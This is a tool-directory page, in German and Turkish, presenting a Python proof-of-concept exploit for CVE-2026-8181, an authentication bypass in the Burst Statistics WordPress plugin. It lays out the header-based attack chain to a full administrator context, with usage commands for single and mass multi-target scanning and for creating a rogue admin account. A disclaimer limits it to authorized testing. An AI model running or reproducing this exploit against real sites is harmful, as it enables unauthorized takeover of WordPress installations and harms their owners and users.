Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-8181 — CVE-2026-8181 PoC: Burst Statistics (3.4.0–3.4.1.1) authentication bypass. Python tool — single & multi-target scans, threaded workers, TXT reports. Authorized testing only. Maintainer: mürrez. | Kitploit
Tools/GitHubGitHub/murrez/cve-2026-8181
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingAuthentication
GitHubmurrez/cve-2026-8181

CVE-2026-8181

CVE-2026-8181 PoC: Burst Statistics (3.4.0–3.4.1.1) authentication bypass. Python tool — single & multi-target scans, threaded workers, TXT reports. Authorized testing only. Maintainer: mürrez.

Repository anzeigen
3vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Typing-Einführung EN
Typing-Einführung TR
Tagline EN/TR



CVE CVSS WP Python

DE: Kontrollierter PoC und kurze technische Hinweise für authorisierte Sicherheitstests des Authentifizierungsbypasses in Burst Statistics.

TR: Burst Statistics eklentisindeki kimlik doğrulama atlatası için yetkili güvenlik testi amaçlı kontrollü PoC ve kısa teknik özet.


Projektübersicht / Proje özeti

Deutsch

Hinweis: Die 200.000+ aktive Installationen auf WordPress.org beziehen sich auf die gesamte Nutzerbasis des Plugins – das bedeutet nicht, dass jede Seite eine verwundbare Version ausführt. Die tatsächliche Auswirkung erfordert die Überprüfung von Version + Umgebung (HTTP-/Anwendungspasswort-Verfügbarkeit usw.).

Türkçe

Not: WordPress.org’daki 200.000+ aktif kurulum sayısı eklentinin tüm kullanıcı tabanıdır; sitelerin tamamının zafiyetli sürümde olduğu anlamına gelmez. Gerçek etki için sürüm + ortam (HTTP, uygulama parolası uygunluğu vb.) doğrulanmalıdır.


Visuelles / Dokümantasyon görselleri

Deutsch

GitHub-Flavored Markdown bettet keine binären GIFs ein, ohne dass eine Datei im Repository vorhanden ist. Die obigen Typing SVG-Schnipsel (CDN) simulieren Bewegung. Um einen eigenen Screen-Capture hinzuzufügen:

root@kitploit:~
![Lab demo](https://raw.githubusercontent.com/murrez/cve-2026-8181/HEAD/assets/demo.gif)

Türkçe

GitHub Markdown, repoda dosya olmadan GIF gömmeyi desteklemez. Üstteki Typing SVG (CDN) yazı animasyonu verir. Kendi demosun için:

root@kitploit:~
![Lab demo](https://raw.githubusercontent.com/murrez/cve-2026-8181/HEAD/assets/demo.gif)

Angriffskette (Mermaid) / Saldırı zinciri

Deutsch — Diagrammbeschriftungen

root@kitploit:~
flowchart LR
  A[Client-Anfrage] --> B[X-BURSTMAINWP: 1]
  A --> C[Authorization: Basic]
  B --> D[plugins_loaded]
  D --> E[is_mainwp_authenticated]
  E --> F{wp_authenticate_application_password == null?}
  F -->|Falsch behandelter Zweig| G[get_user_by login]
  G --> H[wp_set_current_user]
  H --> I[REST: vollständiger Admin-Kontext]

Türkçe — aynı akış

root@kitploit:~
flowchart LR
  A[İstek] --> B[X-BURSTMAINWP: 1]
  A --> C[Authorization: Basic]
  B --> D[plugins_loaded]
  D --> E[is_mainwp_authenticated]
  E --> F{wp_authenticate_application_password == null?}
  F -->|Yanlış dal| G[get_user_by login]
  G --> H[wp_set_current_user]
  H --> I[REST: tam admin bağlamı]

Werkzeugfunktionen / Araç yetenekleri

Deutsch

Mit -f sind -o und --output-dir gegenseitig ausschließend.

Türkçe

-f modunda -o ile --output-dir aynı anda kullanılamaz.


Installation / Kurulum

root@kitploit:~
pip3 install requests urllib3

Nutzungsbeispiele / Kullanım örnekleri

Deutsch

root@kitploit:~
# Einzelne Seite, Berichtsdatei
python3 CVE-2026-8181.py -u http://lab.local -U admin -o bericht.txt -k

# Einzelne Seite + neuer Admin (Labor)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o bericht.txt -k

# Mehrere + kombinierte Datei (nur Erfolge)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o erfolge.txt -k

# Mehrere + Pro-Host-Dateien im Ordner (nur Erfolge)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./ergebnisse -k

Türkçe

root@kitploit:~
# Tek site, rapor
python3 CVE-2026-8181.py -u http://lab.local -U admin -o sonuc.txt -k

# Tek site + yeni yönetici (lab)
python3 CVE-2026-8181.py -u http://lab.local -U admin --create-user -o sonuc.txt -k

# Çoklu + birleşik dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 -o basarili.txt -k

# Çoklu + klasörde site başına dosya (yalnızca başarılılar)
python3 CVE-2026-8181.py -f targets.txt -j 20 --output-dir ./results -k

Leeres Password:-Feld / Boş parola satırı

Deutsch

Ein erfolgreicher Bypass gibt das echte Passwort des Opfer-Benutzers nicht preis – das Basic-Passwort im PoC ist gefälscht. Die Zeile Password: bleibt leer, es sei denn, --create-user hat ein neues Konto erstellt (dann wird das generierte Passwort eingetragen).

Türkçe

Başarılı bypass mevcut kullanıcının gerçek parolasını sızdırmaz — PoC’taki Basic parola sahtedir. Password: satırı --create-user ile yeni hesap oluşturulmadıkça boş kalır; oluşturulduysa üretilen şifre yazılır.


Referenzen / Kaynaklar

Deutsch

  • Burst Statistics — WordPress Plugin-Verzeichnis
  • Häufig in koordinierter Offenlegung zitiert: Wordfence Threat Intelligence, PRISM
  • CVE: MITRE CVE-2026-8181 · NVD

Türkçe

  • Burst Statistics — WordPress eklenti dizini
  • Koordineli açıklamada sık geçen: Wordfence Threat Intelligence, PRISM
  • CVE: MITRE CVE-2026-8181 · NVD

Haftungsausschluss / Feragatname

Deutsch

Nur für schriftlich autorisierte Bewertungen und Ihr eigenes Labor. Unbefugte Nutzung ist in vielen Rechtsordnungen illegal. Autoren und der Betreuer dieser README übernehmen keine Haftung für Missbrauch.

Türkçe

Yazılı izinli değerlendirmeler ve kendi laboratuvarınız içindir. İzinsiz kullanım birçok ülkede yasadışıdır. Yazarlar ve bu README’nin düzenleyicisi kötüye kullanımdan sorumlu değildir.

Tool herunterladen
FeldDetail
WasAuthentifizierungsbypass (CWE-287) in Burst Statistics: manipulierte Header können REST-Anfragen auf vollständigen Admin-Kontext eskalieren.
VersionenVerwundbar: 3.4.0, 3.4.1, 3.4.1.1 · Verwenden: 3.4.2 oder neuer
SchweregradCVSS ~9.8 (Kritisch); remote, ohne Authentifizierung unter geeigneten Bedingungen.
Dieses RepoCVE-2026-8181.py — Laborautomatisierung: Einzelziel, Bulk-Liste, Thread-Pool, selektive TXT-Ausgabe.
AlanDetay
NeBurst Statistics için kimlik doğrulama atlatası (CWE-287). Özel başlıklar ile REST isteğinde tam yönetici bağlamı.
SürümEtkilenir: 3.4.0, 3.4.1, 3.4.1.1 · Önerilir: 3.4.2 ve üzeri
CiddiyetCVSS ~9.8 (Critical); uygun koşullarda uzaktan ve kimlik gerektirmeden.
Bu depoCVE-2026-8181.py — lab otomasyonu: tek hedef, liste taraması, iş parçacığı havuzu, seçici TXT çıktısı.
FunktionBeschreibung
Einzelziel-u Basis-URL
Mehrere Ziele-f targets.txt (eine URL pro Zeile; # als Kommentar)
Parallelität-j N Arbeiter (begrenzt)
Kombinierte Datei-o datei.txt — mit -f werden nur erfolgreiche Exploits angehängt
Pro-Host-Dateien--output-dir — nur Erfolge erhalten host.txt (Fehlschläge werden übersprungen)
Neuer Admin--create-user — zufälliger Benutzer via REST (Passwort erscheint danach im Bericht)
TLS (Labor)-k deaktiviert die Zertifikatsprüfung (nur vertrauenswürdige Labore)
ÖzellikAçıklama
Tek hedef-u kök adres
Çoklu hedef-f targets.txt (satır başına URL; # yorumu)
Paralellik-j N işçi (üst sınırlı)
Tek dosya-o dosya.txt — -f ile yalnızca başarılı exploit eklenir
Klasör çıktısı--output-dir — sadece başarılılar host.txt alır
Yeni admin--create-user — REST ile rastgele kullanıcı (şifre raporda)
TLS (lab)-k sertifika doğrulamasını kapatır (yalnızca güvenilir lab)